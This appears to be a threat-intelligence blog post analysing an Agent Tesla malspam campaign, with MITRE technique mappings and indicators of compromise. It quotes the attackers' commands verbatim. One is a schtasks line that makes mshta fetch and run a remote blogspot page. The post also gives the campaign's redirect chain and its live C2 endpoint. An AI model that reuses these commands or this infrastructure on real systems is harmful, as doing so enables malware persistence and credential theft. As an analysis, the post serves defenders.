Agent Tesla — December 6, 2021 malware campaign

December 6, 2021 · u145 · 2 min read

Agent Tesla is a spyware that exfiltrates information from victim systems by capturing keystrokes and user actions (T1056.001 — Keylogging). Built on the .NET framework, it transmits stolen data to a command-and-control (C2) server. Agent Tesla extracts credentials and stored data from web browsers, email clients, and FTP clients (T1555.003 — Credentials from Web Browsers, T1552.001 — Credentials in Files). The malware bundles antivirus evasion and persistence mechanisms, ensuring it survives a system reboot.

In recent days we observed a new malspam campaign delivering this family. The lure email instructs the recipient to download and open the attached document.

The attached .doc file leverages mshta.exe (T1218.005 — Mshta) to reach the domain https://bitly[.]com/asdqwdwdsfvcxvccv, which serves the following HTML redirect:

<html>
<head><title>Bitly</title></head>
<body><a href="https://sqlserviceazure.blogspot[.]com/p/bathindasboba[.]html">moved here</a></body>
</html>

After several staged downloads, a scheduled task is created via the following command (T1053.005 — Scheduled Task):

"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""Bluefibonashi"" /F /tr """"\""""MsHtA""""\""""http://1230948%1230948@sqlserverserviceagent.blogspot.com/p/justtheback.html\""""

Concurrently, the Agent Tesla payload is downloaded and executed via PowerShell (T1059.001 — PowerShell). The implant then beacons to its C2 by issuing HTTP POST requests to http://microsoftazyresql.duckdns.org/j/p29oa/mawa/eae7bc3b675ad7042607.php (T1071.001 — Web Protocols).

Agent Tesla is, at its core, a keylogger and data stealer: credentials harvested from major browsers, configuration files, and credentials for VPN clients, FTP clients, and mail clients are systematically targeted. Tracking the C2 infrastructure, malspam lures, and operator tradecraft for commodity stealers like Agent Tesla is the daily work of our Cyber Threat Intelligence.

IOC

DOC file:

Filename invoice#6317236-booking.com,pdf.doc
MD5 d74f268b986fecfa03b81029dd134811
SHA1 d49848ac2888e080883a427ef18b406fdcab6b9b
SHA256 81fcb3dce45b041a91b0c0e01c27e032d7e8d26217d4b6d669ce258b491a830d

Domains:

C2
- microsoftazyresql.duckdns[.]org
- 103.147.185[.]68
Dropper
- bitly[.]com
- 67.199.248[.]14

Commodity .NET stealers reach victims through living-off-the-land binaries — mshta, schtasks, powershell — chained behind a single weaponised office document; defence against this delivery chain rests on telemetry over signatures.

Cookie	Duration	Description
VISITOR_INFO1_LIVE	5 months 27 days	A cookie set by YouTube to measure bandwidth that determines whether the user gets the new or old player interface.
YSC	session	YSC cookie is set by Youtube and is used to track the views of embedded videos on Youtube pages.
yt-remote-connected-devices	never	YouTube sets this cookie to store the video preferences of the user using embedded YouTube video.
yt-remote-device-id	never	YouTube sets this cookie to store the video preferences of the user using embedded YouTube video.
yt.innertube::nextId	never	This cookie, set by YouTube, registers a unique ID to store data on what videos from YouTube the user has seen.
yt.innertube::requests	never	This cookie, set by YouTube, registers a unique ID to store data on what videos from YouTube the user has seen.

Cookie & Privacy